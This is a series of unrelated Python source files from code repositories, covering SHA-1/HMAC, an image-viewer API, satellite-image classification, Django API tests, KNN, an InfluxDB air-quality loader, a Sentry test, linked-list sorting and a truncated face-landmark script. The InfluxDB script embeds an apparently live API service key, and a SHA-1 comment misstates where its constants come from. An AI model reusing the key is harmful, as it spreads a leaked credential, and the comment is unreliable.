rotateRight(x: int, y: int) -> int:\n c0: int = x >> y\n c1: int = x << 32 - y\n return (c0 | c1) & BIT_MASK\n\n\ndef ch(x: int, y: int, z: int) -> int:\n c0: int = x & y\n c1: int = x ^ BIT_MASK\n c2: int = c1 & z\n return c0 ^ c2\n\n\ndef maj(x: int, y: int, z: int) -> int:\n c0: int = x & y\n c1: int = x & z\n c2: int = y & z\n return c0 ^ c1 ^ c2\n\n\ndef ft(s: int, x: int, y: int, z: int) -> int:\n if s == 0: return ch(x, y, z)\n if s == 1 or s == 3: return x ^ y ^ z\n if s == 2: return maj(x, y, z) \n\n\ndef gamma(w: int, x: int, y: int, z: int) -> int:\n c0: int = rotateRight(w, x)\n c1: int = rotateRight(w, y)\n c2: int = w >> z\n return c0 ^ c1 ^ c2\n\n\ndef sigma(w: int, x: int, y: int, z: int) -> int:\n c0: int = rotateRight(w, x)\n c1: int = rotateRight(w, y)\n c2: int = rotateRight(w, z)\n return c0 ^ c1 ^ c2\n\n\ndef update(out: List[int], msg: List[int], start: int) -> None:\n W: List[int] = [0] * 80\n\n for i in range(16):\n W[i] = msg[start + i]\n\n for i in range(16, 80):\n c: int = W[i - 3] ^ W[i - 8] ^ W[i - 14] ^ W[i - 16]\n W[i] = rotateRight(c, 31)\n\n H: List[int] = [out[0], out[1], out[2], out[3], out[4]]\n\n for i in range(len(W)):\n s: int = i // 20\n t: int = (rotateRight(H[0], 27) + ft(s, H[1], H[2], H[3]) + H[4] + W[i] + K[s]) & BIT_MASK\n H[4] = H[3]\n H[3] = H[2]\n H[2] = rotateRight(H[1], 2)\n H[1] = H[0]\n H[0] = t\n\n for i in range(len(H)):\n out[i] = (out[i] + H[i]) & BIT_MASK\n\n\ndef sha1(message: List[int]) -> List[int]:\n # The first 32 bits of the fractional parts of the square roots of the first 5 primes.\n H: List[int] = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, 0xc3d2e1f0]\n\n padding: List[int] = shaPad(message, 8) # Ensure 'message' length is evenly divisible by 64.\n payload: List[int] = joinBytes(padding, 4) # Convert byte array to 32-bit array.\n\n # Use each 32 bit interval of 'message' to update 'H'.\n for i in range(0, len(payload), 16):\n update(H, payload, i)\n\n # Convert 32-bit array to byte array.\n return splitBits(H, 4)\n\n\ndef hmac1(key: List[int], message: List[int]) -> List[int]:\n if len(key) > 64:\n key = sha1(key)\n\n # Ensure 'key' length is evenly divisible by 64.\n padded: List[int] = [0] * 64\n for i in range(len(key)):\n padded[i] = key[i]\n\n # Xor each 
bit value of 'padded' and 0x36.\n for i in range(len(padded)):\n padded[i] ^= 0x36\n inner = padded + message\n\n # Xor each bit value of 'padded' and 0x6a.\n for i in range(len(padded)):\n padded[i] ^= 0x6a\n outer = padded + sha1(inner)\n\n return sha1(outer)\n\n\nif __name__ == '__main__':\n seed: List[int] = [\n 17, 30, 0, 32, 247, 20, 162, 6,\n 47, 0, 31, 160, 16, 252, 180, 179,\n 136, 24, 172, 113, 103, 72, 59, 104,\n 135, 229, 132, 209, 107, 129, 161, 171\n ]\n\n message: List[int] = [\n 116, 61, 190, 93, 174, 15, 154, 165,\n 22, 242, 56, 13, 168, 8, 194, 94,\n 110, 224, 129, 237, 180, 216, 85, 221,\n 167, 203, 32, 104, 169, 181, 142, 159\n ]\n\n \"\"\"\n [\n 80, 157, 238, 228, 93, 168, 13, 36, 154, 30,\n 202, 232, 182, 73, 69, 143, 109, 73, 59, 153\n ]\n \"\"\"\n hashed: List[int] = sha1(seed)\n print(hashed)\n\n \"\"\"\n [\n 226, 250, 216, 40, 236, 216, 81, 102, 19, 54,\n 185, 126, 89, 122, 19, 60, 196, 149, 62, 22\n ]\n \"\"\"\n hmac: List[int] = hmac1(seed, message)\n print(hmac)","repo_name":"BinaryBand/crypto-pi","sub_path":"sha1.py","file_name":"sha1.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13750111888","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"`Utilities to interact with the application`.\"\"\"\n\nimport os\nfrom typing import List, Iterable, Callable, BinaryIO\nfrom vimiv.qt.gui import QPixmap\n\nfrom vimiv.utils import files, imagereader, imageheader\n\nfrom vimiv.api import (\n commands,\n completion,\n keybindings,\n modes,\n objreg,\n prompt,\n settings,\n signals,\n status,\n working_directory,\n _mark,\n _modules,\n)\n\nmark = _mark.Mark()\n\n\ndef current_path(mode: modes.Mode = None) -> str:\n \"\"\"Get the currently selected path.\n\n Args:\n mode: Force getting the currently selected path of a specific mode.\n Returns:\n The currently selected path as abspath.\n \"\"\"\n mode = mode if mode else modes.current()\n return mode.current_path\n\n\ndef pathlist(mode: modes.Mode = None) -> List[str]:\n \"\"\"Get the list of all currently open paths.\n\n Args:\n mode: Force getting the pathlist of a specific mode.\n Returns:\n The list of currently open paths.\n \"\"\"\n mode = mode if mode else modes.current()\n return list(mode.pathlist) # Ensure we create a copy\n\n\n@keybindings.register(\"o\", \"command --text='open '\")\n@commands.register(name=\"open\")\ndef open_paths(paths: Iterable[str]) -> None:\n \"\"\"Open one or more paths.\n\n **syntax:** ``:open path [path ...]``\n\n If any path given is an image, all valid images are opened in image mode. Otherwise\n the first valid directory is opened. If both fails, an error is displayed.\n\n .. 
hint:: Passing a single directory therefore changes the directory in the library,\n think ``cd``.\n\n positional arguments:\n * ``paths``: The path(s) to open.\n \"\"\"\n images, directories = files.supported(paths)\n if images:\n working_directory.handler.chdir(os.path.dirname(images[0]))\n signals.load_images.emit(images)\n modes.IMAGE.enter()\n elif directories:\n working_directory.handler.chdir(directories[0])\n modes.LIBRARY.enter()\n else:\n raise commands.CommandError(\"No valid paths\")\n\n\ndef add_external_format(\n file_format: str,\n test_func: imageheader.CheckFuncT,\n load_func: Callable[[str], QPixmap],\n) -> None:\n \"\"\"Add support for new fileformat.\n\n Args:\n file_format: String value of the file type\n test_func: Function returning True if load_func supports this type.\n load_func: Function to load a QPixmap from the passed path.\n \"\"\"\n # Prioritize external formats over all default formats, to ensure that on signature\n # collision, the explicitly registered handler is used.\n imageheader.register(file_format, test_func, priority=True)\n imagereader.external_handler[file_format] = load_func\n","repo_name":"karlch/vimiv-qt","sub_path":"vimiv/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"77"} +{"seq_id":"38059249081","text":"import argparse\nimport os\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tqdm import tqdm\n\nfrom scripts.get_s2_data_ee import get_history, get_pixel_vectors\n\ndef normalize(x):\n return (np.array(x) - 0) / (3000 - 0)\n\ndef stretch_histogram(array, min_val=0.1, max_val=0.75, gamma=1.2):\n clipped = np.clip(array, min_val, max_val)\n stretched = (clipped - min_val) / (max_val - min_val) ** gamma\n return stretched\n\ndef make_predictions(model_path, data, site_name, threshold):\n test_image = data\n model = keras.models.load_model(model_path)\n\n rgb_stack = []\n preds_stack = []\n threshold_stack = []\n print(\"Making Predictions\")\n for month in tqdm(list(test_image.keys())):\n test_pixel_vectors, width, height = get_pixel_vectors(test_image, month)\n if width > 0:\n test_pixel_vectors = normalize(test_pixel_vectors)\n\n r = np.reshape(np.array(test_pixel_vectors)[:,3], (width, height))\n g = np.reshape(np.array(test_pixel_vectors)[:,2], (width, height))\n b = np.reshape(np.array(test_pixel_vectors)[:,1], (width, height))\n rgb = np.moveaxis(np.stack((r,g,b)), 0, -1)\n rgb_stack.append(rgb)\n\n preds = model.predict(np.expand_dims(test_pixel_vectors, axis=-1))\n preds_img = np.reshape(preds, (width, height, 2))[:,:,1]\n preds_stack.append(preds_img)\n\n thresh_img = preds_img >= threshold\n threshold_stack.append(thresh_img)\n\n output_dir = '../figures/neural_network'\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n\n rgb_median = np.median(rgb_stack, axis=0)\n preds_median = np.mean(preds_stack, axis=0)\n threshold_median = np.median(threshold_stack, axis=0)\n\n plt.figure(dpi=150, figsize=(15,5))\n\n plt.subplot(1,3,1)\n plt.imshow(stretch_histogram(rgb_median))\n plt.title(f'{site_name} Median', size=8)\n plt.axis('off')\n\n plt.subplot(1,3,2)\n plt.imshow(preds_median, vmin=0, vmax=1, cmap='RdBu_r')\n plt.title('Classification Mean', size=8)\n plt.axis('off')\n\n plt.subplot(1,3,3)\n plt.imshow(threshold_median, vmin=0, vmax=1, cmap='gray')\n plt.title(f\"Positive Pixels 
Median: Threshold {threshold}\", size=8)\n plt.axis('off')\n\n title = f\"{site_name} - Median Values - Neural Network Classification - Threshold {threshold}\"\n plt.suptitle(title, y=1.01)\n plt.tight_layout()\n plt.savefig(os.path.join(output_dir, title + '.png'), bbox_inches='tight')\n plt.close()\n\n\n fig, ax = plt.subplots(dpi=200, facecolor=(1,1,1), figsize=(4,4))\n ax.set_axis_off()\n clipped_img = np.moveaxis([channel * (preds_median >= 0) for channel in np.moveaxis(rgb_median, -1, 0)], 0, -1)\n img = plt.imshow(np.clip(stretch_histogram(clipped_img), 0, 1))\n ax.set_title('Threshold 0.00', size=10)\n plt.tight_layout()\n\n def animate(i):\n i /= 100\n clipped_img = np.moveaxis([channel * (preds_median >= i) for channel in np.moveaxis(rgb_median, -1, 0)], 0, -1)\n img.set_data(np.clip(stretch_histogram(clipped_img), 0, 1))\n #img.set_data((preds_stack > i) * 1)\n ax.set_title(f\"{site_name} Threshold {i:.2f}\", size=10)\n return img,\n\n ani = animation.FuncAnimation(fig, animate, frames=100, interval=60, blit=True, repeat_delay=500)\n ani.save(os.path.join(output_dir, site_name + '_threshold_visualization' + '.mp4'))\n plt.close()\n\n return rgb_median, preds_median, threshold_median\n\ndef main():\n parser = argparse.ArgumentParser(description='Configure patch prediction')\n parser.add_argument('--coords', nargs='+', required=True, type=float, help='Lat Lon of patch center')\n parser.add_argument('--width', type=float, required=False, default=0.002, help='Width of patch in degrees. Max 0.03')\n parser.add_argument('--network', type=str, required=True, help='Path to neural network')\n parser.add_argument('--threshold', type=float, required=False, default=0.95, help='Classifier masking threshold')\n parser.add_argument('--num_months', type=int, required=False, default=22, help='Number of months to use for predictions')\n parser.add_argument('--start_date', type=str, required=False, default='2019-01-01', help='Start date for predictions')\n args = parser.parse_args()\n if args.width and args.width > 0.03:\n parser.error(\"Maximum patch width is 0.03\")\n\n coords = args.coords\n print(coords)\n lat = coords[0]\n lon = coords[1]\n width = args.width\n model_path = args.network\n threshold = args.threshold\n num_months = args.num_months\n start_date = args.start_date\n\n name = f\"{lat:.2f}, {lon:.2f}, {width} patch\"\n\n patch_history = get_history([[lon, lat]], [name], width, num_months=num_months, start_date=start_date)\n rgb_median, preds_median, threshold_median = make_predictions(model_path, patch_history, name, threshold)\n\nif __name__ == '__main__':\n main()\n","repo_name":"earthrise-media/plastics","sub_path":"scripts/nn_predict_gee.py","file_name":"nn_predict_gee.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"23916789399","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import status\nfrom rest_framework.test import APIClient, APITestCase\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nfrom contact.models import Contact\n\nUser = get_user_model()\n\n\nclass TestContact(APITestCase):\n \"\"\" Test contact api. 
\"\"\"\n\n contact_url = '/api/v1/contacts/'\n\n @classmethod\n def setUpClass(cls):\n super(TestContact, cls).setUpClass()\n cls.first_user = User.objects.create_user(\n username='first_user',\n )\n cls.second_user = User.objects.create_user(\n username='second_user',\n )\n cls.first_user_contact = Contact.objects.create(\n owner=cls.first_user,\n first_name='Иван',\n last_name='Иванов',\n phone='+79046738754',\n email='ivanov@ivan.ru',\n )\n cls.second_user_contact = Contact.objects.create(\n owner=cls.second_user,\n first_name='Петр',\n last_name='Петров',\n phone='+79104563499',\n email='petrov@petr.ru',\n )\n\n def setUp(self) -> None:\n self.guest_client = APIClient()\n\n self.first_authorized_client = APIClient()\n first_token = RefreshToken.for_user(self.first_user)\n self.first_authorized_client.credentials(\n HTTP_AUTHORIZATION=f'Bearer {str(first_token.access_token)}'\n )\n\n self.second_authorized_client = APIClient()\n second_token = RefreshToken.for_user(self.second_user)\n self.second_authorized_client.credentials(\n HTTP_AUTHORIZATION=f'Bearer {str(second_token.access_token)}'\n )\n\n def test_get_contact_by_guest(self):\n response = self.guest_client.get(self.contact_url)\n expected_error = {'detail': 'Authentication credentials were not provided.'}\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(response.json(), expected_error)\n\n def test_get_contact_list_by_owner(self):\n contacts_count = Contact.objects.filter(owner=self.first_user).count()\n response = self.first_authorized_client.get(self.contact_url)\n expected_keys = ['count', 'next', 'previous', 'results']\n\n response_json = response.json()\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(list(response_json.keys()), expected_keys)\n self.assertEqual(response_json['count'], contacts_count)\n\n for contact in response_json['results']:\n self.assertTrue(Contact.objects.filter(\n owner=self.first_user,\n first_name=contact['first_name'],\n last_name=contact['last_name'],\n phone=contact['phone'],\n email=contact['email'],\n ).exists())\n\n def test_get_contact_with_id_by_owner(self):\n response = self.first_authorized_client.get(\n self.contact_url + str(self.first_user_contact.id) + '/'\n )\n\n response_json = response.json()\n contact = Contact.objects.filter(\n id=response_json['id'],\n first_name=response_json['first_name'],\n last_name=response_json['last_name'],\n phone=response_json['phone'],\n email=response_json['email'],\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n self.assertTrue(contact.exists())\n self.assertEqual(contact.first().owner, self.first_user)\n\n def test_get_contact_with_id_by_another_user(self):\n response = self.second_authorized_client.get(\n self.contact_url + str(self.first_user_contact.id) + '/'\n )\n expected_error = {'detail': 'Not found.'}\n\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n self.assertEqual(response.json(), expected_error)\n\n def test_create_contact_by_guest(self):\n data = {\n 'first_name': 'Guest',\n 'last_name': 'Guestovich',\n 'phone': '89003337777',\n 'email': 'guest@guestovich.ru',\n }\n response = self.guest_client.post(self.contact_url, data=data)\n expected_error = {'detail': 'Authentication credentials were not provided.'}\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(response.json(), expected_error)\n\n def test_create_contact_with_bad_data(self):\n data = {}\n response = 
self.first_authorized_client.post(self.contact_url, data=data)\n expected_error = ['This field is required.']\n response_json = response.json()\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n for error in response_json:\n self.assertEqual(\n response_json[error],\n expected_error\n )\n\n def test_validate_phone(self):\n invalid_phones = [\n '89oo3337777',\n 'phone',\n '111',\n '+790364548973134',\n '9036454897'\n ]\n data = {\n 'first_name': 'Phone',\n 'last_name': 'Phonovich',\n 'email': 'phone@phonovich.ru',\n }\n expected_error = {'phone': ['Invalid phone number format.']}\n for phone in invalid_phones:\n data['phone'] = phone\n response = self.first_authorized_client.post(self.contact_url, data=data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, phone)\n self.assertEqual(response.json(), expected_error)\n\n def test_create_contact(self):\n contacts_count = Contact.objects.count()\n data = {\n 'first_name': 'First',\n 'last_name': 'User',\n 'phone': '89003337777',\n 'email': 'first@user.ru',\n }\n response = self.first_authorized_client.post(self.contact_url, data=data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Contact.objects.count(), contacts_count + 1)\n\n def test_put_patch_delete_contact_by_another_user(self):\n url = self.contact_url + str(self.second_user_contact.id) + '/'\n methods = ['put', 'patch', 'delete']\n for method in methods:\n met = getattr(self.first_authorized_client, method)\n response = met(url)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_put_patch_contact_by_owner(self):\n url = self.contact_url + str(self.first_user_contact.id) + '/'\n data = {\n 'first_name': 'Another first name',\n 'last_name': 'Another last name',\n 'phone': '89023567834',\n 'email': 'new@new.ru',\n }\n\n response = self.first_authorized_client.put(url, data=data)\n response_json = response.json()\n contact = Contact.objects.get(id=self.first_user_contact.id)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEquals(\n [\n contact.id,\n contact.first_name,\n contact.last_name,\n contact.phone,\n contact.email,\n ],\n [\n response_json['id'],\n response_json['first_name'],\n response_json['last_name'],\n response_json['phone'],\n response_json['email'],\n ]\n )\n\n def test_patch_contact_by_owner(self):\n url = self.contact_url + str(self.first_user_contact.id) + '/'\n data = {'phone': '89058754387'}\n\n response = self.first_authorized_client.patch(url, data=data)\n response_json = response.json()\n contact = Contact.objects.get(id=self.first_user_contact.id)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n contact.phone,\n response_json['phone']\n )\n\n def test_delete_contact_by_owner(self):\n url = self.contact_url + str(self.first_user_contact.id) + '/'\n\n response = self.first_authorized_client.delete(url)\n\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n","repo_name":"qzonic/NextLevel","sub_path":"phonebook/api/tests/test_contact.py","file_name":"test_contact.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18709412027","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 18 18:25:00 2016\n\n@author: meil\n\nKNN\n\nInput:\npath,k\n\nOutput:\nfinalclass\n\nParameter:\ndistFun\n\n\"\"\"\nimport sys\nimport io\nfrom numpy import *\nimport math\nimport 
operator\n\ndef loaddataset(path):\n \n fp=open(path,'rb')\n content=fp.read()\n fp.close()\n rowlist=content.splitlines()\n \n dataset=[row.split('\\t') for row in rowlist if row.strip()]\n \n return dataset\n \ndef file2matrix(dataset):\n \n dataset=array(dataset)\n m,n=shape(dataset)\n trainset=zeros((m,n-1))\n labels=ones((m,1),dtype=str)\n for i in xrange(m):\n for j in xrange(n-1):\n trainset[i,j]=float(dataset[i,j])\n \n labels=dataset[:,-1]\n \n return trainset,labels\n \ndef KNN(trainset,labels,testvec,k):\n\n m,n=shape(trainset)\n traindata=trainset\n distdic={}\n for i in xrange(m):\n dist=distEclud(traindata[i,:],testvec)\n distdic[i]=dist\n \n distlist=sorted(distdic.iteritems(),key=operator.itemgetter(1),reverse=False)\n \n classdict={}\n \n for i in xrange(k):\n label=labels[distlist[i][0]]\n classdict[label]=classdict.get(label,0)+1\n \n finalclass=sorted(classdict.iteritems(),key=operator.itemgetter(1),reverse=True)[0][0]\n \n return finalclass \n \ndef distEclud(vecA,vecB):\n return linalg.norm(vecA-vecB)\n \n\ndataset=loaddataset('testdata/knntrain.txt')\ntrainset,labels=file2matrix(dataset)\ntestvec=[14488,8.327,0.954]\nk=10\n\nfinalclass=KNN(trainset,labels,testvec,k)\n","repo_name":"JackMeiLong/ML.Practise","sub_path":"Classify/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11961444810","text":"#pip install influxdb before running this script\r\nfrom influxdb import InfluxDBClient\r\nfrom datetime import datetime\r\nimport urllib\r\nimport json\r\nimport pandas as pd\r\nimport numpy as np\r\nimport time,schedule,threading\r\n\r\n#Set up the InfluxDB connection\r\nclient = InfluxDBClient(host='localhost', port=8086, database='tstest')#testDB')\r\nclient.get_list_database() #확인하기\r\nclient.switch_database('tstest')\r\n\r\n#api 소환\r\nurl='http://apis.data.go.kr/B552584/ArpltnInforInqireSvc/getCtprvnRltmMesureDnsty?serviceKey=zRFvHX1aXXCIImm6VM1r41s7qtk%2BZvLgs6in9M1REA4KFCxy9almfJetM4CgsUwUOATf7XkgGquTvNULLJtJ%2FA%3D%3D&returnType=json&numOfRows=100&pageNo=1&sidoName=%EB%B6%80%EC%82%B0&ver=1.0'\r\nresult =json.load(urllib.request.urlopen(url))\r\ndf2=pd.read_csv('구변환(중복제거).csv')\r\nco = []\r\npm10 = []\r\ndate = []\r\nstation = []\r\nfor i in range(len(result['response']['body']['items'])) :\r\n co.append(result['response']['body']['items'][i]['coValue'])\r\n pm10.append(result['response']['body']['items'][i]['pm10Value'])\r\n date.append(result['response']['body']['items'][i]['dataTime'])\r\n station.append(result['response']['body']['items'][i]['stationName'])\r\napi=pd.DataFrame({'CO':co,'PM10':pm10,'time':date,'측정소명':station})\r\napi1=pd.merge(api,df2,how='outer',on='측정소명').drop('측정소명',axis=1)\r\napi1.rename(columns={'지역':'region'},inplace=True)\r\napi1 = api1.replace('-',np.nan)\r\napi1=api1.fillna(method='ffill')\r\napi1['time']=pd.to_datetime(api1['time'])\r\n#print(api1)\r\n#Setup Payload 넣을 데이터 불러와서 넣으면 될듯\r\njson_payload = []\r\nfor y in range(len(api1)):\r\n data = {\r\n \"measurement\": \"newdatatest\",\r\n \"tags\":{\r\n \"region\": api1[\"region\"].iloc[y]\r\n\r\n },\r\n \"time\" : api1['time'].iloc[y], #실행하는 날짜 넣어보기 테스트용\r\n \"fields\":{\r\n \"PM10\": api1['PM10'].iloc[y],\r\n \"CO\":api1['CO'].iloc[y]\r\n }\r\n }\r\n json_payload.append(data) \r\n #Send payload to InfluxDB 디비에 집어 넣는 명령어\r\n print(data)\r\n\r\n# print(data)\r\n# \r\n\r\n# #Send payload to InfluxDB 디비에 집어 넣는 명령어\r\n# try:\r\n# 
client.write_points(json_payload)\r\n# except Exception as e: # 모든 예외의 에러 메시지를 출력할 때는 Exception을 사용\r\n# print('예외가 발생했습니다.', e)\r\n","repo_name":"sherpajun/PhythonPratice","sub_path":"infulxdb.py","file_name":"infulxdb.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36980758138","text":"from __future__ import absolute_import\n\nfrom sentry import tagstore\nfrom sentry.tagstore.models import EventTag\nfrom sentry.models import (\n Event, EventAttachment, EventMapping, File, ScheduledDeletion, UserReport\n)\nfrom sentry.tasks.deletion import run_deletion\nfrom sentry.testutils import TestCase\n\n\nclass DeleteEventTest(TestCase):\n def test_simple(self):\n project = self.create_project()\n group = self.create_group(\n project=project,\n )\n event = self.create_event(group=group)\n EventAttachment.objects.create(\n event_id=event.event_id,\n project_id=event.project_id,\n file=File.objects.create(\n name='hello.png',\n type='image/png',\n ),\n name='hello.png',\n )\n UserReport.objects.create(\n event_id=event.event_id,\n project_id=event.project_id,\n name='Jane Doe',\n )\n key = 'key'\n value = 'value'\n tk = tagstore.create_tag_key(\n project_id=project.id,\n environment_id=self.environment.id,\n key=key\n )\n tv = tagstore.create_tag_value(\n project_id=project.id,\n environment_id=self.environment.id,\n key=key,\n value=value\n )\n tagstore.create_event_tags(\n event_id=event.id,\n group_id=group.id,\n project_id=project.id,\n environment_id=self.environment.id,\n tags=[\n (tk.key, tv.value),\n ],\n )\n\n deletion = ScheduledDeletion.schedule(event, days=0)\n deletion.update(in_progress=True)\n\n with self.tasks():\n run_deletion(deletion.id)\n\n assert not Event.objects.filter(id=event.id).exists()\n assert not EventAttachment.objects.filter(\n event_id=event.event_id,\n project_id=project.id,\n ).exists()\n assert not EventMapping.objects.filter(\n event_id=event.event_id,\n project_id=project.id,\n ).exists()\n assert not UserReport.objects.filter(\n event_id=event.event_id,\n project_id=project.id,\n ).exists()\n assert not EventTag.objects.filter(event_id=event.id).exists()\n","repo_name":"GaryChen66/sentry","sub_path":"tests/sentry/deletions/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74107545207","text":"# Course: 2302-001\n# Author: Esteban Retana\n# Assignment: Practice sorting algorithms\n# Instructor: Olac Fuentes\n# TA: Anindita Nath\n# Date of last modification:2/23/19\n# Purpose: Sort linked lists with different sorting algorithms and figure out their time complexity\n\nimport random\nimport time\n\n#Node Functions\nclass Node(object):\n # Constructor\n def __init__(self, item, next=None): \n self.item = item\n self.next = next \n \ndef PrintNodes(N):\n if N != None:\n print(N.item, end=' ')\n PrintNodes(N.next)\n \ndef PrintNodesReverse(N):\n if N != None:\n PrintNodesReverse(N.next)\n print(N.item, end=' ')\n \n#List Functions\nclass List(object): \n # Constructor\n def __init__(self): \n self.head = None\n self.tail = None\n \ndef IsEmpty(L): \n return L.head == None \n \ndef Append(L,x): \n # Inserts x at end of list L\n if IsEmpty(L):\n L.head = Node(x)\n L.tail = L.head\n else:\n L.tail.next = Node(x)\n L.tail = L.tail.next\n \ndef Print(L):\n # Prints list L's items in order using a loop\n temp = L.head\n while 
temp is not None:\n print(temp.item, end=' ')\n temp = temp.next\n print() # New line \n\ndef PrintRec(L):\n # Prints list L's items in order using recursion\n PrintNodes(L.head)\n print() \n \ndef Remove(L,x):\n # Removes x from list L\n # It does nothing if x is not in L\n if L.head==None:\n return\n if L.head.item == x:\n if L.head == L.tail: # x is the only element in list\n L.head = None\n L.tail = None\n else:\n L.head = L.head.next\n else:\n # Find x\n temp = L.head\n while temp.next != None and temp.next.item !=x:\n temp = temp.next\n if temp.next != None: # x was found\n if temp.next == L.tail: # x is the last node\n L.tail = temp\n L.tail.next = None\n else:\n temp.next = temp.next.next\n \ndef PrintReverse(L):\n # Prints list L's items in reverse order\n PrintNodesReverse(L.head)\n print() \n# Create a clone of the linked list \ndef Copy(L):\n temp = L.head\n new_copy = List()\n while temp != None:\n Append(new_copy, temp.item)\n temp = temp.next\n\n return new_copy \n# Obtain item by traversing through the list\ndef ElementAt(L,x):\n temp = L.head\n\n for i in range(x):\n temp = temp.next\n\n return temp.item\n# Get the size of the Linked list\ndef GetLength(L):\n temp = L.head\n i = 0\n while temp != None:\n i += 1\n temp = temp.next\n\n return i\n\ndef Median(L):\n C = Copy(L)\n return ElementAt(C,GetLength(C)//2)\n \n# Create random list of integers\ndef random_list():\n L = List()\n for x in range(5):\n n = random.randint(0,46)\n Append(L, n)\n return L\n\n# Bubble sort algorithm\ndef Bubble_sort(L):\n if IsEmpty(L):\n return\n\n if L.head != None and L.head.next == None :\n return L.head.item\n\n if L != None:\n temp = L.head\n is_sorting = True\n while is_sorting:\n temp = L.head\n is_sorting = False\n while temp.next != None:\n if temp.item > temp.next.item:\n is_sorting = True\n int_temp = temp.item\n temp.item = temp.next.item\n temp.next.item = int_temp\n temp = temp.next\n\n return Median(L)\n\ndef Split_list(L):\n if L == None:\n return L\n after = L.next\n before = L\n\n while after != None:\n after = after.next\n if after != None:\n before = before.next\n after=after.next\n return before\n\ndef Merge(L,K):\n combined = None\n # If a list is shorter than the other\n if L == None:\n return K\n if K == None:\n return L\n # L is less than, therefore L is inserted first\n if L.item <= K.item:\n combined = L\n combined.next = Merge(L.next, K) \n # K is less than, therefore K is inserted first\n else:\n combined = K\n combined.next = Merge(L, K.next) \n\n return combined \n\ndef Merge_sort(L):\n # If list is empty or only one element\n if L == None or L.next == None:\n return L\n\n if L != None:\n mid = Split_list(L)\n r = mid.next\n\n mid.next = None\n\n left = Merge_sort(L)\n right = Merge_sort(r)\n # j = Merge_sort(right)\n sorted_list = Merge(left,right)\n\n # final_list = List()\n # final_list.head = sorted_list\n return sorted_list\n \nC = random_list()\n# Print(C)\n\nL = Copy(C)\n\nPrint(L)\nprint(Bubble_sort(L))\nPrint(L)\n\nL = Copy(C)\n# Print(L)\nk = List()\n# start_time = time.time()\nPrint(k)\nk.head = Merge_sort(L.head)\nPrint(k)\n# end_time = time.time() - start_time\n# print(end_time)\nprint(Median(k))\n\n","repo_name":"eretana238/CS2302","sub_path":"Lab2/Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33556770120","text":"import cv2\nimport dlib\nimport glob\nimport os\n\n\nOUTPUT_PARENT_DIR = 
\"output\"\nos.makedirs(OUTPUT_PARENT_DIR, exist_ok=True)\n\nLANDMARK_COUNT = 68\n\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\nprint(\"******************* PROCESSING STARTED *******************\\n\\n\")\n\nfor file in glob.glob(\"./data/Deepfakes/*.mp4\"):\n path, filename = os.path.split(file)\n print(\"Currently processing video: \" + filename)\n video_name = os.path.splitext(filename)[0]\n\n '''\n Each video has a corresponding directory,\n under which, each file is a single frame,\n in which, in line is a landmark coordinate\n '''\n\n OUTPUT_LANDMARK_DIR = os.path.join(OUTPUT_PARENT_DIR, video_name)\n os.makedirs(OUTPUT_LANDMARK_DIR, exist_ok=True)\n\n cap = cv2.VideoCapture(\"./data/Deepfakes/\" + video_name + \".mp4\")\n\n frame_count = 0\n\n while cap.isOpened():\n success, frame = cap.read()\n current_frame_landmark = []\n if success:\n # cv2.imshow('window-name', frame)\n frame_count = frame_count + 1\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # To speed up detection by converting to grayscale\n faces = detector(frame_gray)\n for face in faces:\n landmarks = predictor(frame_gray, face)\n count = 0\n for n in range(LANDMARK_COUNT):\n x = landmarks.part(n).x\n y = landmarks.part(n).y\n current_frame_landmark.append([x, y])\n count += 1\n if current_frame_landmark:\n file_name = \"frame_\" + str(frame_count) + \".txt\"\n complete_file_name = os.path.join(OUTPUT_LANDMARK_DIR, file_name)\n file = open(complete_file_name, \"w\")\n\n for x, y in current_frame_landmark:\n file.write(str(x) + \" \" + str(y) + \"\\n\")\n file.close()\n else:\n break\n if 